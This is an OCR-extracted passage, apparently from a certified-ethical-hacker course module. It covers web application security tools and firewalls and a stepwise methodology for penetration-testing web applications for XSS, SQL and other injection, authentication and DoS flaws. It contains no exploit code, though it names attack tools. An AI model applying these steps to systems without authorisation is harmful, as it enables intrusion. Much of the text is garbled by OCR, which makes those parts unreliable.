W eb application security tools are web application security assessm ent softw are
designed to thoroughly analyze tod ay's com plex web applications w ith the aim of finding
e x p l o i t a b l e S Q L i n j e c t i o n , XSS v u l n e r a b i l i t i e s , e t c . T h e s e t o o l s d e l i v e r s c a n n i n g c a p a b i l i t i e s ,
b ro a d a s s e s s m e n t c o v e ra g e , a n d a c c u r a te w e b app licatio n sc a n n in g results. C o m m o n ly u se d
w e b a p p lic a tio n se c u r ity to o ls a r e listed as follow s:
0 O W A S P ZAP a v a i l a b l e a t h t t p : / / w w w . o w a s p . o r g
6 skipfish a v a ilab le a t h t t p : / / c o d e . g o o g l e . c o m
© SPIKE P r o x y a v a i l a b l e a t h t t p : / / w w w . i m m u n i t v s e c . c o m
Q X5s a v a ila b le a t h t t p : / / w w w . c a s a b a . c o m
https://secure.bevondsecuritv.com
W a p iti i p i S y h u n t H y b rid
h t t p : / / w a p i t i , s o u r c e fo r g e , n e t h ttp ://w w w .s y h u n t.com
W e b W a tc h B o t E x p lo it- M e
h t t p : / / w w w . e x c la m a tio n s o f t . c o m
1
M h t t p : / '/ l a b s , s e c u r it y c o m p a s s .c o m
Kf -r ! \ KeepN I
h t t p : / / w w w . k e e p n i. c o m
(P " W S D ig g e r
h t t p : / / w w w . m c a fe e . c o m
G ra b b e r A ra c h n i
h t t p : / / r g a u c h e r . in fo □ □ ם h t t p : / / a r a c h n i- s c a n n e r . c o m
xsss Vega
h t tp : //w w w .s ven. de - ח ד h t t p : / / w w w .s u b g ra p h . c o m
In a d d i t i o n t o t h e p r e v i o u s l y m e n t i o n e d w e b a p p l i c a t i o n s e c u r i t y t o o l s , t h e r e a r e f e w
m o r e tools th a t can be u sed to assess th e security of w e b applications:
© XSSS a v a i l a b l e a t h t t p : / / w w w . s v e n . d e
© S v h u n t Hybrid av a ila b le a t h t t p : / / w w w . s v h u n t . c o m
© W SD igger available at h tt p :/ /w w w .m c a f e e .c o m
© V ega available at h tt p :/ /w w w .s u b g r a p h .c o m
d o tD e fe n d e r is a s o ftw a r e
AM
e * י׳מייvew *ovomrs .» »«*׳hc*<
based W e b A p p lic a tio n cbtOefrndEr(329 daysfcft)
F ire w a ll
il U EventView?(Locrf)
_tlו׳ויInternetIrrfonriaaarSer*
d tDefender
4> Gbbal Settngs
I t c o m p le m e n ts th e □ {2) De^aiJt Scanty FtoSe p-otec
n e t w o r k f ir e w a ll, IPS and
Server Ma*ng
[£ Lpka: Fok:»5־
i 9 SQL
־Infection
0 £ כPatterns awM* ypev. sol r t- « «
o th e r n e tw o rk -b a s e d ffl fel WhalBt (Perm!*d As
ij £2) Pararoc
In te r n e t s e c u rity p ro d u c ts ij fgtEncotlnQ w Suspect Single Quote (Safe)
[fl BjffwOi'eHbn □
a £21SQLlr!j*ct>cr
I t in s p e c ts th e HTTP/HTTPS Lae ׳cHhed
מPattern = Pattern □
t r a f fic f o r su sp icio u s CB .71 ־CT0B-5WSowanc
b e h a v io r CU c7t *,י^ג
Classic SQL Comment ’־־ D
ש c7(•י־*יי5
I t d e te c ts a n d b lo c k s SQL Ltl uJ)
R«no(e ca< ״m#nfl l*e
Q) Ced* mrrten( )!
w SQL Comments Q
U
flj*e]<:*•<<ז W ‘Select Version' Statement Q
. ןAfttna FTP *זיל:Jw LVaUi:
P SQL CHAR Type ם
http://www. opplicure.com
dotD efender™ is a s o f t w a r e - b a s e d w e b a p p l i c a t i o n f i r e w a l l t h a t p r o v i d e s a d d i t i o n a l w e b s i t e
security against malicious attacks and w ebsite defacem ent. It p r o t e c t s your w ebsite from
m alicious attacks. W eb application attacks such as SQL in je c tio n , path traversal, cross-site
scripting, a n d o t h e r a tta c k s leading to w e b s ite d e f a c e m e n t can b e p r e v e n t e d w ith d o tD e f e n d e r .
It c o m p l e m e n t s t h e n e t w o r k f i r e w a l l , IPS, a n d o t h e r n e t w o r k - b a s e d I n t e r n e t s e c u r i t y p r o d u c t s .
It i n s p e c t s H T T P / H T T P S t r a f f i c f o r s u s p i c i o u s b e h a v i o r .
17 IS_SRVROLEMEMBER fo llo w e d by ( D
FIGURE 1 3 .6 7 : d o tD e fe n d e r
S erve rD efen der VP W eb a p p lic a tio n fire w a ll is d e sig ned to p ro v id e s e c u rity a g ainst w e b a tta cks
p o r t8 0
SQL Injection
&Z|aoACfttJ«9teStTplng(>SS) M l_______ v_
ribicdKTW
Gcnenc ]׳ru t wrrtiratwn
OiNone
$l**Mun 0 ^נ. II. 12, H 31, 127, 175-223, 25$)
C) Extended (>, <,', ♦ וMnmum
1
OPwanad (L *. M . ,] *M a d id
http://www.port80software.com
T h e S e r v e r D e f e n d e r V P w e b a p p l i c a t i o n f i r e w a l l is d e s i g n e d t o p r o v i d e s e c u r i t y a g a i n s t w e b
attacks. SDVP security wi l l prevent data theft and breaches and stop unauthorized site
d e f a c e m e n t , file a l t e r a t i o n s , a n d d e l e t i o n s .
s e r v e r d e fe n d e r V P
WEB APPLICATION FIREWALL
port80
WIN-ETLRP50T7LB • OFF • LOG ONLY O ON
Protection for Default Web Site is ON
m D efajlt Profile
J Default Web Site (Custom)
J Request jfe /R e sp o rse / ^ \ Session E׳ «״ Admir
4 : Sit*
|| Status Mgmt Mgmt Mgmt Mgmt • • Options
Input Vafcdation B irfer Overflow J Resources | Methods | URLs | File Uploads ] Exceptions
Generc In pu t Sanitization
O None
Apply ]
s e rv e rd e fe n d e r VP port80
WEB APPLICATION FIREWALL
g REDBRICK
Protection for Gauntlet is ON • OFF • L O G ONLY 0 ON
V Default Profile
Enforcement Level
V Default W eb Site
| G e n e r c P iiA c S it e *] S h ow
Details
Administration 1 2 3 4 5
Assets
Site Status | Blocked IPs | Aierbng | R eporting |
Refresh
ServerDef enderVP Statistics Snce 11/8/2011
FIGURE 1 3 .6 8 : S e rv e rD e fe n d e r VP
W
Q u a ly s G u a rd W AF IB M S e c u r ity A p p S c a n
h t t p : / / w w w . q u a ty s . c o m h t t p : / / w w w -0 1 . ib m . c o m
T h re a tR a d a r T r u s tw a v e W e b D e fe n d
h t t p : / / w w w . im p e r v a . c o m h t t p s : / / w w w . tr u s t w a v e , c o m
© T h re a tR a d a r available a t h tt p :/ /w w w .im p e r v a .c o m
© IBM S e c u r i t y A p p S c a n a v a i l a b l e a t h t t p : / / w w w - 0 1 . i b m . c o m
M o d u l e F lo w C E H
W eb A pp C oncepts
fa
* Q Q Q
S e c u rity Tools W eb A pp Threats
^־־ M o d u le F lo w
As m e n t i o n e d p r e v i o u s l y , w e b a p p l i c a t i o n s a r e m o r e v u l n e r a b l e t o a t t a c k s . A t t a c k e r s
use w eb applications as th e sources for spreading attacks by tu rn in g t h e m into m alicious
applications once com prom ised. Your w e b application may also become a victim of such
a t t a c k s . T h e r e f o r e , t o a v o i d t h i s s i t u a t i o n , y o u s h o u l d c o n d u c t p e n e t r a t i o n t e s t i n g in o r d e r t o
d e t e r m i n e t h e vulnerabilities b e fo r e th e y a re ex p lo ited by real a ttack ers.
W e b a p p l i c a t i o n s c a n b e c o m p r o m i s e d in m a n y w a y s . T h i s s e c t i o n d e s c r i b e s h o w t o c o n d u c t
w e b a p p l i c a t i o n p e n t e s t i n g a g a i n s t all p o s s i b l e k i n d s o f a t t a c k s .
J W eb a p p lica tio n pen te s tin g is used to id e n tify , a na lyze , and r e p o r t v u ln e r a b ilitie s such as in p u t va lid a tio n ,
b u ffe r o v e rflo w , SQL in je c tio n , b ypassing a u th e n tic a tio n , code execution, etc. in a g iven a p p lica tio n
□j
p -----------
1 http.׳/
sm m
!
R e m e d ia tio n o f V u ln e ra b ilitie s
Id e n tific a tio n o f P orts
W e b a p p l i c a t i o n p e n t e s t i n g h e l p s in:
0 V e r i f i c a t i o n o f V u l n e r a b i l i t i e s : T o e x p l o i t t h e v u l n e r a b i l i t y in o r d e r t o t e s t a n d f i x t h e
issue.
_ _
W e b A p p lic a t io n P e n T e s t in g
C E H
( C o n t ’d )
START
------------------- * ---------------------
v
------------------- * ---------------------
9 --------------------- ■--------------------- V
------------------- * ---------------------
V
S t e p 1: D e f i n i n g o b j e c t i v e
Y o u s h o u l d d e f i n e t h e a i m o f t h e p e n e t r a t i o n t e s t b e f o r e c o n d u c t i n g it. T h i s w o u l d h e l p y o u t o
m o v e in r i g h t d i r e c t i o n t o w a r d s y o u r a i m o f p e n e t r a t i o n t e s t .
S t e p 2: I n f o r m a t i o n g a t h e r i n g
S t e p 3: C o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
S te p 4: A u t h e n t i c a t i o n t e s ti n g s e s s io n
S t e p 5: S e s s i o n m a n a g e m e n t t e s t i n g
S t e p 6: D e n i a l - o f - s e r v i c e t e s t i n g
S e n d a v a s t a m o u n t o f r e q u e s t s t o t h e w e b a p p li c a ti o n until t h e s e r v e r g e t s s a t u r a t e d . A n aly ze
t h e b e h a v i o r o f a p p l i c a t i o n w h e n t h e s e r v e r is s a t u r a t e d . In t h i s w a y y o u c a n t e s t y o u r w e b
application against denial-of-service attacks.
S t e p 7: D a t a v a l i d a t i o n t e s t i n g
F a i l i n g t o a d o p t a p r o p e r d a t a v a l i d a t i o n m e t h o d is t h e c o m m o n s e c u r i t y w e a k n e s s o b s e r v e d in
m ost w eb a p p lic a tio n s . This m a y f u r t h e r lead to m ajo r vulnerabilities in w e b applications.
H ence, b e fo r e a h a c k e r finds th o s e vulnerabilities a n d exploits y o u r application, p e rf o rm d a ta
validation testin g an d p ro te c t y o u r w e b application.
S t e p 8: B u s i n e s s log ic t e s t i n g
W e b a p p l i c a t i o n s e c u r i t y f l a w s m a y b e p r e s e n t e v e n in b u s i n e s s logic. H e n c e , y o u s h o u l d t e s t
t h e b u s i n e s s l o g i c f o r f l a w s . E x p l o i t i n g t h i s b u s i n e s s l o g i c , a t t a c k e r s m a y d o s o m e t h i n g t h a t is
n o t a l l o w e d b y b u s i n e s s e s a n d it m a y s o m e t i m e s l e a d t o g r e a t f i n a n c i a l l o s s . Testing b usiness
logic f o r s e c u r i t y f l a w s r e q u i r e s u n c o n v e n t i o n a l t h i n k in g .
S t e p 9: A u t h o r i z a t i o n t e s t i n g
S te p 10: W e b se r v ic e s te s t i n g
S t e p 11: AJAX t e s t i n g
T h o u g h m o r e r e s p o n s i v e w e b a p p l i c a t i o n s a r e d e v e l o p e d u s i n g AJAX, it is l i k e l y a s v u l n e r a b l e a s
a traditional web application. Testing for AJAX is challenging because web application
d e v e l o p e r s a r e g i v e n f ul l f r e e d o m to design th e w ay of c o m m u n icatio n b etw een client a n d
server.
S t e p 1 2 : D o c u m e n t all t h e f i n d i n g s
O n c e y o u c o n d u c t all t h e t e s t s m e n t i o n e d h e r e , d o c u m e n t all t h e f i n d i n g s a n d t h e t e s t i n g
techniques em ployed at each step . Analyze t h e d o c u m e n t a n d explain t h e c u rre n t security
p o s tu re to t h e c o n c e r n e d p arties a n d s u g g e s t h o w th e y can e n h a n c e th e ir security.
I n f o r m a t io n G a t h e r in g C E H
I n f o r m a tio n G a th e r in g
S t e p 1: A n a l y z e t h e r o b o t s . t x t f i l e
R o b o t . t x t is a f i l e t h a t i n s t r u c t s w e b r o b o t s a b o u t t h e w e b s i t e s u c h a s d i r e c t o r i e s t h a t c a n b e
allow ed a n d disallow ed to th e user. H ence, analyze th e ro b o t.tx t an d d e te r m in e th e allow ed
a n d d i s a l l o w e d d i r e c t o r i e s o f a w e b a p p l i c a t i o n . Y ou c a n r e t r i e v e a n d a n a l y z e r o b o t s . t x t file
using tools such as GNU W get.
S t e p 2: P e r f o r m s e a r c h e n g i n e r e c o n n a i s s a n c e
Use th e advanced "site:" s e a r c h operator and then click C a c h e d t o perform search engine
r e c o n n a i s s a n c e . It g i v e s y o u i n f o r m a t i o n s u c h a s i s s u e s o f w e b a p p l i c a t i o n s t r u c t u r e a n d e r r o r
pages produced.
S t e p 3: I d e n t i f y a p p l i c a t i o n e n t r y p o i n t s
Identify application entry points using tools such as W eb scarab , Burp Proxy, O W A S P ZAP,
T a m p e r l E ( f o r I n t e r n e t E x p l o r e r ) , o r T a m p e r D a t a ( f o r F ir efo x). C o o k i e i n f o r m a t i o n , 3 0 0 HTTP
a n d 4 0 0 s t a tu s c o d e s , a n d 5 0 0 in te rn a l s e r v e r e rr o rs m a y give clues a b o u t e n tr y p o in ts of t h e
ta rg e t w e b application.
S t e p 5: A n a l y z e t h e O / P f r o m HEAD a n d O P T I O N S h t t p r e q u e s t s
Im plem ent techniques such as DNS z o n e transfers, DNS inverse queries, w eb-based DNS
s e a r c h e s , q u e r y in g s e a r c h e n g in e s (Googling). This m a y re v eal in f o r m a tio n s u c h a s w e b s e r v e r
s o f t w a r e v e r s i o n , s c r i p t i n g e n v i r o n m e n t , a n d O S in u s e .
I n f o r m a t io n G a t h e r in g r g u
( C o n t ’d ) (•lllfwtf | ltkl«4l NMhM
>/
I n f o r m a tio n G a th e r in g ( C o n t ’d )
S t e p 6: A n a l y z e e r r o r c o d e s
Analyze error codes by requesting invalid pages and utilize alternate request m ethods
( P O S T / P U T / O t h e r ) in o r d e r t o c o l l e c t c o n f i d e n t i a l i n f o r m a t i o n f r o m t h e s e r v e r . T h i s m a y r e v e a l
inform ation such as softw are versions, details of databases, bugs, and technological
com ponents.
S t e p 7: T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s
T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s b y r e q u e s t i n g c o m m o n file e x t e n s i o n s s u c h
a s . AS P, . H T M , . P H P , .EXE, a n d o b s e r v e t h e r e s p o n s e . T h i s m a y g i v e y o u a n i d e a a b o u t t h e w e b
application en v iro n m en t.
S t e p 8: E x a m i n e s o u r c e o f a v a i l a b l e p a g e s
S t e p 9: T C P /I C M P a n d s e r v ic e f i n g e r p r i n t i n g
Perform TCP/ICM P a n d service fingerprinting using tra d itio n a l fin g erp rin tin g to o ls such as
N m ap and Queso, or the m o r e r e c e n t a p p lic a tio n fin g e rp rin tin g to o ls A m a p . This gives y o u
in fo rm atio n a b o u t w e b application services a n d asso ciate d ports.
r C o n fig u ratio n M a n a g e m e n t
Testing
&
c EH
tertMM
Source code, in s ta lla tio n V e rify th e presence o f old , Test fo r in fra s tru c tu re A d m in interfaces can be
paths, passw ords fo r backup, and u n re fe re n c e d and a p p lic a tio n adm in fo u n d t o gain access to
app lica tio n s, and databases file s in te rfa c e s adm in fu n c tio n a lity
C o n f ig u r a tio n M a n a g e m e n t T e s tin g
f ^ \
Once you gather inform ation about the web application environm ent, test the
configuration m anagem ent. It is i m p o r t a n t t o test th e configuration m anagem ent because
im p r o p e r c o n fig u ratio n m a y allow u n a u t h o r i z e d u s e r s to b re a k into t h e w e b application.
S t e p l : P e r f o r m SSL/TLS t e s t i n g
S S L / TL S t e s t i n g a l l o w s y o u t o i d e n t i f y t h e p o r t s a s s o c i a t e d w i t h S S L / T L S w r a p p e d s e r v i c e s . Y o u
c a n d o th is w ith t h e h e lp o f to o ls s u c h a s N m a p a n d N e ssu s. This h e lp s d is clo se c o n fid e n tia l
inform ation.
S t e p 2: P e r f o r m i n f r a s t r u c t u r e c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
S t e p 3: P e r f o r m a p p l i c a t i o n c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
S t e p 4: T e s t f o r file e x t e n s i o n s h a n d l i n g
S t e p 5: V e r if y t h e p r e s e n c e o f o ld , b a c k u p , a n d u n r e f e r e n c e d files
Review source code and enum erate application pages and functionality to verify t h e old,
backup, and unreferenced files. T his may reveal the installation paths and passw ords for
applications an d d atab a ses.
S t e p 6: T e s t f o r i n f r a s t r u c t u r e a n d a p p l i c a t i o n a d m i n i n t e r f a c e s
P e r f o r m d i r e c t o r y a n d file e n u m e r a t i o n , r e v i e w s e r v e r a n d a p p l i c a t i o n d o c u m e n t a t i o n , e t c . t o
t e s t fo r in f r a s tru c tu re a n d a p p lic a tio n a d m i n in te rfa c e s. A d m in in te rfa c e s c a n b e u s e d to gain
access to t h e a d m in functionality.
S t e p 7: T e s t f o r H T T P m e t h o d s a n d XST
R e v i e w O P T I O N S H T T P m e t h o d u s i n g N e t c a t o r T e l n e t t o t e s t f o r H T T P m e t h o d s a n d XST. T h i s
m a y reveal cred en tials of legitim ate users.
A u t h e n t ic a t io n T e s t in g C E H
® A tt e m p t t o fo r c e a ra ce c o n d itio n , m ake
Test f o r race m u ltip le sim u lta n e o u s re q ue sts w h ile
Race c o n d itio n s
c o n d itio n s o b se rvin g th e o u tco m e f o r u ne xp e cte d
b e h a vio r. P erfo rm co de re vie w .
S t e p 1: T e s t f o r V u l n e r a b l e R e m e m b e r p a s s w o r d a n d p w d r e s e t
T e st fo r V u ln e ra b le R e m e m b e r p a s s w o r d a n d p w d r e s e t by a t t e m p t i n g t o r e s e t p a s s w o r d s by
g u e s s i n g , s o c i a l e n g i n e e r i n g , o r c r a c k i n g s e c r e t q u e s t i o n s , if u s e d . C h e c k if a " r e m e m b e r m y
p a s s w o r d " m e c h a n i s m is i m p l e m e n t e d b y c h e c k i n g t h e H T M L c o d e o f t h e l o g i n p a g e ; t h r o u g h
this p a s s w o rd , a u th e n tic a tio n w e a k n e s s can b e u n c o v e re d .
S t e p 2: T e s t f o r l o g o u t a n d b r o w s e r c a c h e m a n a g e m e n t
S t e p 3: T e s t f o r C APTC HA
I d e n t i f y all p a r a m e t e r s t h a t a r e s e n t in a d d i t i o n t o t h e d e c o d e d C A P T C H A v a l u e f r o m t h e c l i e n t
t o t h e s e r v e r a n d t r y t o s e n d a n o l d d e c o d e d C A P T C H A v a l u e w i t h a n o l d C A P T C H A ID o f a n o l d
s e s s i o n ID. T h i s h e l p s y o u t o d e t e r m i n e a u t h e n t i c a t i o n v u l n e r a b i l i t i e s .
S te p 4: T e s t fo r m u ltip le f a c t o r s a u t h e n t i c a t i o n
C h e c k if u s e r s h o l d a h a r d w a r e d e v i c e o f s o m e k i n d i n a d d i t i o n t o t h e p a s s w o r d . C h e c k if t h e
hardw are device com m unicates directly and independently w ith the authentication
infrastru ctu re using an a d d itio n a l c o m m u n ic a tio n c h a n n e l.
S t e p 5: T e s t f o r r a c e c o n d i t i o n s
Session M a n a g e m e n t T e s tin g C E H
pySj S e s s io n M a n a g e m e n t T e s tin g
S t e p 1: T e s t f o r s e s s i o n m a n a g e m e n t s c h e m a
S t e p 2: T e s t f o r c o o k i e a t t r i b u t e s
S t e p 3: T e s t f o r s e s s i o n f i x a t i o n
S te p 4: T e s t fo r e x p o s e d s e s s io n v a ria b le s
S t e p 5: T e s t f o r CSRF ( C r o s s S ite R e q u e s t F o r g e r y )
E x a m i n e t h e U RL s in t h e r e s t r i c t e d a r e a t o t e s t f o r C S RF . A C SR F a t t a c k c o m p r o m i s e s e n d - u s e r
d a ta a n d o p e ra tio n or th e en tire w e b application.
A u t h o r iz a t io n T e s t in g C EH
teftMM ItkMJl Nm Im
START
y Can ga in access to
re s e rv e d in fo r m a tio n
© Test fo r path traversal by p erform ing in p u t v e c to r e n u m e ra tio n and analyzing th e in p u t va lid a tio n fu n c tio n s present in
th e w eb application
e Test fo r bypassing a uth oriza tion schema by exam ining the adm in fu n c tio n a litie s , to gain access to th e resources
assigned to a d iffe re n t role
A u th o r iz a tio n T e s tin g
Follow the steps here to test the web application against authorization
vulnerabilities:
S t e p 1: T e s t f o r p a t h t r a v e r s a l
Test for path traversal by perform ing input vector enum eration and analyzing the input
validation fu n ctio n s present in t h e web application. P ath trav ersal allow s a tta c k e rs to gain
access to reserved inform ation.
S t e p 2: T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a
S t e p 3: T e s t f o r p r i v i l e g e e s c a l a t i o n
T e s t f o r r o l e / p r i v i l e g e m a n i p u l a t i o n . If t h e a t t a c k e r h a s a c c e s s t o r e s o u r c e s / f u n c t i o n a l i t y , t h e n
h e or s h e can p e rfo rm a privilege e sc a la tio n a tta c k .
D a t a V a lid a t io n T e s t in g C E H
U rtifM itfciui Nm Im
START
Detect and analyze input vectors for potential vulnerabilities, analyze the
Session cookie vulnerability report and attempt to exploit it. Use tools such asOWASP CAL9000,
WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
in fo rm a tio n
Analyze HTMLcode, test for Stored XSS, leverageStoredXSS,verifyifthefile
upload allows setting arbitrary MIMEtypes using tools such asOWASP CAL9000,
Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp,and XSS Assistant
9 Perform source code analysis to identify JavaScript coding errors
Sensitive in fo rm a tio n
Test fo r s to re d 9 Analyze SWF files using tools such as SWFIntruder, Decompiler ־Flare, Compiler
such as session
c ro s s -s ite s c rip tin g ־MTASC, Disassembler -Flasm,Swfmil I, and Debugger Version of Flash
a uth oriza tion tokens Plugi n/Player
9 Perform Standard SQL Injection Testing, Union Query SQL Injection Testing,
Blind SQL Injection Testing, and Stored Procedure Injection using tools suchas
OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQLPower Injector, etc.
Test fo r D O M -b a s e d « Use a trial and error approach by inserting'(',' I', and the other
Cookie in fo rm a tio n
c ro s s -s ite s c rip tin g characters in order to check the appl icati on for errors. Use the tool Softerra
LDAP Browser
In fo rm a tio n on DOM-
Test fo r cross s ite Sensitive in fo rm a tio n
based cross-site < .......
fla s h in g a bo u t users and hosts
scripting vulnerabilities
S t e p 1: T e s t f o r r e f l e c t e d c r o s s - s i t e s c r i p t i n g
A r e f l e c t e d c r o s s - s i t e s c r i p t i n g a t t a c k e r c r a f t s a URL t o e x p l o i t t h e r e f l e c t e d XSS v u l n e r a b i l i t y
a n d s e n d s it t o t h e c l i e n t in a s p a m m a i l . If t h e v i c t i m c l i c k s o n t h e l i n k c o n s i d e r i n g it a s f r o m a
t r u s t e d s e r v e r , t h e m a l i c i o u s s c r i p t e m b e d d e d b y t h e a t t a c k e r in t h e URL g e t s e x e c u t e d o n t h e
victim 's b r o w s e r a n d sends the victim 's s e s s io n cookie to the attacker. Using this sessio n
co o k ie , t h e a t t a c k e r c a n ste a l t h e s e n s itiv e in f o r m a tio n o f t h e victim . H e n c e , t o av o id th is kind
o f a t t a c k y o u m u s t c h e c k y o u r w e b a p p l i c a t i o n s a g a i n s t r e f l e c t e d XSS a t t a c k s . If y o u p u t p r o p e r
d a t a v a l i d a t i o n m e c h a n i s m s o r m e t h o d s in p l a c e , t h e n y o u c a n d e t e r m i n e e a s i l y w h e t h e r t h e
URL c a m e o r i g i n a l l y f r o m t h e s e r v e r o r it is c r a f t e d b y t h e a t t a c k e r . D e t e c t a n d a n a l y z e i n p u t
v e c t o r s f o r p o t e n t i a l v u l n e r a b i l i t i e s , a n a l y z e t h e v u l n e r a b i l i t y r e p o r t , a n d a t t e m p t t o e x p l o i t it.
U s e t o o l s s u c h a s O W A S P C A L 9 0 0 0 , H a c k v e r t o r , B e E F , X S S - P r o x y , B a c k f r a m e , W e b S c a r a b , XSS
A ssistant, a n d B urp Proxy.
S t e p 2: T e s t f o r s t o r e d c r o s s - s i t e s c r i p t i n g
A n a l y z e H T M L c o d e , t e s t f o r S t o r e d XSS, l e v e r a g e S t o r e d XSS, a n d v e r i f y if t h e f i l e u p l o a d a l l o w s
s e t t i n g a r b i t r a r y M I M E t y p e s u s i n g t o o l s s u c h a s O W A S P C A L 9 00 0, H a c k v e r t o r , BeEF, XSS-Proxy,
B a c k f r a m e , W e b S c a r a b , B u r p , a n d XSS A s s i s t a n t . S t o r e d XSS a t t a c k s a l l o w a t t a c k e r s t o u n c o v e r
sensitive in fo rm atio n such as session au th o rizatio n to k en s.
S t e p 3: T e s t f o r D O M - b a s e d c r o s s - s i t e s c r i p t i n g
S te p 4: T e s t fo r c ro s s site fla sh in g
S t e p 5: P e r f o r m SQL i n j e c t i o n t e s t i n g
S t e p 6: P e r f o r m LDAP i n j e c t i o n t e s t i n g
© D is c o v e r v u ln e r a b ilitie s o f an O R M
t o o l a nd te s t w e b a p p lic a tio n s t h a t use
O R M . U se to o ls such as H ib e rn a te ,
I n fo r m a tio n o n SQL
N h ib e rn a te , and R uby O n Rails
in je c tio n v u ln e ra b ility
© Try t o in s e rt X M L m e ta c h a ra c te rs
© Find if th e w e b s e rv e r a c tu a lly
I n fo r m a tio n a b o u t
s u p p o rts SSI d ire c tiv e s using to o ls
X M L s tru c tu re
such as W e b P roxy B u rp S uite, OWASP
ZAP, W ebS cara b, S trin g s e a rc h e r: grep
W e b s e rv e r CGI © In je c t X P a th c o d e a n d in te r fe re w ith
e n v iro n m e n t v a ria b le s th e q u e ry re s u lt
© I d e n t if y v u ln e r a b le p a ra m e te rs .
U n d e rs ta n d th e d a ta f lo w a nd
Access c o n fid e n tia l d e p lo y m e n t s tru c tu re o f th e c lie n t,
in fo r m a tio n a n d p e r fo rm IM A P /S M T P c o m m a n d
in je c tio n
S t e p 7: P e r f o r m O R M i n j e c t i o n t e s t i n g
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web
a p p l i c a t i o n s t h a t u s e O R M . U s e t o o l s s u c h a s H i b e r n a t e , N h i b e r n a t e , a n d R u b y O n Rails. T h i s
t e s t g iv e s i n f o r m a t i o n o n SQL i n j e c t i o n v u l n e r a b i l i t i e s .
S t e p 8: P e r f o r m X M L i n j e c t i o n t e s t i n g
T o p e r f o r m XML i n j e c t i o n t e s t i n g , t r y t o i n s e r t XML m e t a c h a r a c t e r s a n d o b s e r v e t h e r e s p o n s e .
A s u c c e s s f u l XML i n j e c t i o n m a y giv e i n f o r m a t i o n a b o u t X M L s t r u c t u r e .
S t e p 9 : P e r f o r m SSI i n j e c t i o n t e s t i n g
P e r f o r m SSI i n j e c t i o n t e s t i n g a n d f i n d if t h e w e b s e r v e r a c t u a l l y s u p p o r t s SSI d i r e c t i v e s u s i n g
t o o l s s u c h a s W e b P r o x y B u r p S u i t e , P a r o s , W e b S c a r a b , S t r i n g s e a r c h e r : g r e p . If t h e a t t a c k e r c a n
i n j e c t SSI i m p l e m e n t a t i o n s , then he or she can set or print w e b s e r v e r CGI e n v i r o n m e n t
variables.
S te p 10: P e r f o r m X P a th in je c tio n t e s t i n g
S te p 11: P e r f o r m IM A P /S M T P in je c tio n te s t i n g
S te p 13: P e r f o r m OS c o m m a n d i n g
Perform manual code analysis and craft malicious HTTP requests using | to test for OS
c o m m a n d in j e c t i o n a t t a c k s . OS c o m m a n d i n g m a y r e v e a l local d a t a a n d s y s t e m i n f o r m a t i o n .
S te p 14: P e r f o r m b u f f e r o v e r f l o w te s t i n g
S te p 15: P e r f o r m i n c u b a t e d v u ln e r a b ility t e s t i n g
U pload a file t h a t exploits a com ponent in t h e local user w orkstation, when view ed or
d o w n l o a d e d b y t h e u s e r , p e r f o r m XSS, a n d S Q L i n j e c t i o n a t t a c k s . I n c u b a t e d v u l n e r a b i l i t i e s m a y
give in f o r m a tio n a b o u t s e r v e r c o n fig u ra tio n a n d in p u t v a lid a tio n s c h e m e s to t h e a tta c k e rs .
S t e p 16: T e s t f o r HTTP s p l i t t i n g / s m u g g l i n g
I d e n t i f y all u s e r - c o n t r o l l e d i n p u t t h a t i n f l u e n c e s o n e o r m o r e h e a d e r s in t h e r e s p o n s e a n d c h e c k
w h e th e r he or she can s u c c e s s f u l l y i n j e c t a C R+ LF s e q u e n c e in it. A t t a c k e r s p e r f o r m HTTP
s p l i t t i n g / s m u g g l i n g t o g e t c o o k i e s a n d HTTP r e d i r e c t i n f o r m a t i o n .
S t e p l : T e s t f o r SQL w i l d c a r d a t t a c k s
Find w h e r e t h e n u m b e r s s u b m i t t e d a s a n a m e / v a l u e p a ir m i g h t b e u s e d b y t h e a p p l i c a t i o n c o d e
a n d a t t e m p t t o s e t t h e v a l u e t o a n e x t r e m e l y l a r g e n u m e r i c v a l u e , a n d t h e n s e e if t h e s e r v e r
continues to respond. If t h e attacker knows the m axim um num ber of objects that the
application can handle, he or she can exploit th e application by sending objects beyond
m a x i m u m limit.
D e n ia l־o f־S e r v ic e T e s t in g
CEH
( C o n t ’d )
T e s t f o r u s e r i n p u t a s a l o o p c o u n t e r a n d e n t e r a n e x t r e m e l y l a r g e n u m b e r in t h e i n p u t f i e l d t h a t
is u s e d b y a p p l i c a t i o n a s a l o o p c o u n t e r . If t h e a p p l i c a t i o n f a i l s t o e x h i b i t i t s p r e d e f i n e d m a n n e r ,
it m e a n s t h a t a p p l i c a t i o n c o n t a i n s a l o g i c a l e r r o r .
U s e a s c r i p t t o a u t o m a t i c a l l y s u b m i t a n e x t r e m e l y l o n g v a l u e t o t h e s e r v e r in t h e r e q u e s t t h a t is
b ein g logged.
Identify a n d s e n d a large n u m b e r o f r e q u e s t s t h a t p e r f o r m d a t a b a s e o p e r a t i o n s a n d o b s e r v e
any slow dow n or new error m essages.
S t e p 8 : T e s t f o r s t o r i n g t o o m u c h d a t a in s e s s i o n
w To gather WS information use tools such as wsCh ess, Soaplite, CURL, Peri, etc.
and online tools such as UDDI Browser, WSIndex, and Xmethods
» Use tools such as WSDigger, WebScarab, and Found stone to automate web
services security testing
« Pass malformed SOAP messages to XML parser or attach a very large string to
the message. Use WSdigger to perform autom ated XML structure testing
» Craft an XML docum ent (SOAP message) to send to a web service tha t contains
malware as an attachm ent to check if XML document has SOAP attachm ent
vulnerability
In fo r m a t io n a b o u t SQL,
X P a th , b u f f e r o v e r flo w , I n f o r m a t io n a b o u t
a n d c o m m a n d in je c tio n M I T M v u ln e r a b ilit y
v u ln e r a b ilitie s
H T T P G E T /R E S T SOAP m e ssa ge
a t t a c k v e c to r s in f o r m a t io n
W e b S e r v i c e s T e s t i n g
A JAX a p p lic a t io n c a ll
e n d p o in t s
X M L H t tp R e q u e s t o b je c t ,
P a rs e t h e H T M L a n d
J a v a S c rip t f ile s , A JAX
J a v a S c r ip t f i l e s
